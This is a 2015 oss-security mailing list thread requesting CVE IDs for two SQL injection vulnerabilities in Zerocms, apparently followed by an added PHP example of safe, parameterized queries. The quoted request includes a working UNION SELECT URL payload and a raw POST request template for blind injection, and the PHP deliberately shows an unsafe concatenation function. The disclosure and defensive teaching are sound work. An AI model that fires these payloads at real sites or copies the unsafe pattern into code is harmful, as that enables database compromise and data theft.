Date: Sun, 1 Feb 2015 15:49:16 +0100
From: Steffen Rösemann <steffen.roesemann1986@...il.com>
To: oss-security@...ts.openwall.com
Subject: Re: CVE-Request -- Zerocms <= v. 1.3.3 -- SQL injection vulnerabilities

I just got a reply from MITRE.

I missed that the first SQL injection vulnerability had already been
assigned CVE-2014-4034. Sorry, I missed that one.


Greetings.

Steffen

2015-02-01 9:15 GMT+01:00 Steffen Rösemann <steffen.roesemann1986@...il.com>:

> Hi Steve, Josh, vendors, list.
>
> I found two SQL injection vulnerabilities in Zerocms <= v. 1.3.3.
>
> The first SQL injection vulnerability is located in the article_id
> parameter used in zero_view_article.php and can be exploited even by
> unauthenticated attackers.
>
> See the following exploit-example:
>
> http://{TARGET}/views/zero_view_article.php?article_id=-1+union+select+database%28%29,2,version%28%29,user%28%29,5,6+--+
>
> The second vulnerability is a Blind SQL injection and is located in the
> user_id parameter used in a POST request in zero_transact_user.php.
>
> An attacker can exploit this vulnerability in the administrative backend
> via the following POST request exploit-example:
>
> POST /views/zero_transact_user.php HTTP/1.1
> Host: localhost
> User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:35.0) Gecko/20100101 Firefox/35.0
> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
> Accept-Language: de,en-US;q=0.7,en;q=0.3
> Accept-Encoding: gzip, deflate
> DNT: 1
> Referer: http://{TARGET}/views/zero_user_account.php?user_id=2
> Cookie: PHPSESSID=rirftt07h0dem8d48lujliuve6
> Connection: keep-alive
> Content-Type: application/x-www-form-urlencoded
> Content-Length: 91
>
> name=user&email=user%40user.de&access_level=1&user_id=2 {SQL injection
> goes here}&action=Modify+Account
>
> Could you please assign a CVE-ID for this?
>
> Thank you very much.
>
> Greetings from Germany.
>
> Steffen Rösemann
>
> References:
>
> [1] http://aas9.in/zerocms/
> [2] http://sroesemann.blogspot.de/2015/01/sroeadv-2015-13.html
> [3] https://github.com/perezkarjee/zerocms/issues/3
> [4] https://github.com/sroesemann/zerocms
> [5] https://twitter.com/sroesemann/status/559273548691546113
> [6] http://sroesemann.blogspot.de/2015/01/report-for-advisory-sroeadv-2015-14.html
> [7] http://seclists.org/fulldisclosure/2015/Feb/4
>
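Both issues quoted above come from the same root cause: a request parameter (article_id in a GET query string, user_id in a POST body) is spliced into the SQL text, so an attacker-controlled value can change the query's structure. The following PHP is an added illustration written for this page, not Zerocms code or a patch for it: it shows the unsafe concatenation pattern beside a hardened version that validates the value as an integer and binds it through a PDO prepared statement. The function names, the `$pdo` connection, and the `articles`/`users` table layout are assumptions.

```php
<?php
// Added example, not Zerocms code. $pdo is an assumed existing PDO
// connection; table and column names are hypothetical.
declare(strict_types=1);

// UNSAFE: the raw parameter becomes part of the SQL text. A value such as
// "-1 UNION SELECT ..." is parsed as SQL, which is exactly the article_id
// problem described in the advisory.
function fetch_article_unsafe(PDO $pdo, string $articleId): array|false
{
    $sql = "SELECT id, title, body FROM articles WHERE id = " . $articleId;
    return $pdo->query($sql)->fetch(PDO::FETCH_ASSOC);
}

// SAFE: validate the value as a positive integer, then bind it as a typed
// parameter. The SQL text never contains user data, so its structure is fixed.
function fetch_article_safe(PDO $pdo, string $articleId): array|false
{
    $id = filter_var($articleId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        http_response_code(400);       // reject rather than guess
        return false;
    }
    $stmt = $pdo->prepare("SELECT id, title, body FROM articles WHERE id = :id");
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetch(PDO::FETCH_ASSOC);
}

// Same treatment for the POST-body case (user_id in a "Modify Account" form).
// Every field is validated, and all of them are bound, not concatenated.
function update_user_safe(PDO $pdo, array $post): bool
{
    $userId = filter_var($post['user_id'] ?? '', FILTER_VALIDATE_INT,
                         ['options' => ['min_range' => 1]]);
    $level  = filter_var($post['access_level'] ?? '', FILTER_VALIDATE_INT,
                         ['options' => ['min_range' => 0]]);
    $email  = filter_var($post['email'] ?? '', FILTER_VALIDATE_EMAIL);
    $name   = trim((string)($post['name'] ?? ''));
    if ($userId === false || $level === false || $email === false || $name === '') {
        return false;
    }
    $stmt = $pdo->prepare(
        "UPDATE users SET name = :name, email = :email, access_level = :level WHERE id = :id"
    );
    $stmt->bindValue(':name',  $name,   PDO::PARAM_STR);
    $stmt->bindValue(':email', $email,  PDO::PARAM_STR);
    $stmt->bindValue(':level', $level,  PDO::PARAM_INT);
    $stmt->bindValue(':id',    $userId, PDO::PARAM_INT);
    return $stmt->execute();
}

// Connection setup that makes the safe functions behave as intended:
// real server-side prepares (no client-side emulation) and exceptions on error,
// so a failed query is logged by the application instead of echoed to the client.
function make_pdo(string $dsn, string $user, string $pass): PDO
{
    return new PDO($dsn, $user, $pass, [
        PDO::ATTR_EMULATE_PREPARES => false,
        PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
    ]);
}
```

Two points worth checking when reviewing a fix of this kind: `PDO::ATTR_EMULATE_PREPARES` should be off so the database server, not the client library, separates query text from values; and, for the blind-injection case, database error text must not reach the HTTP response, since error-based and timing-based extraction depend on that feedback channel.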
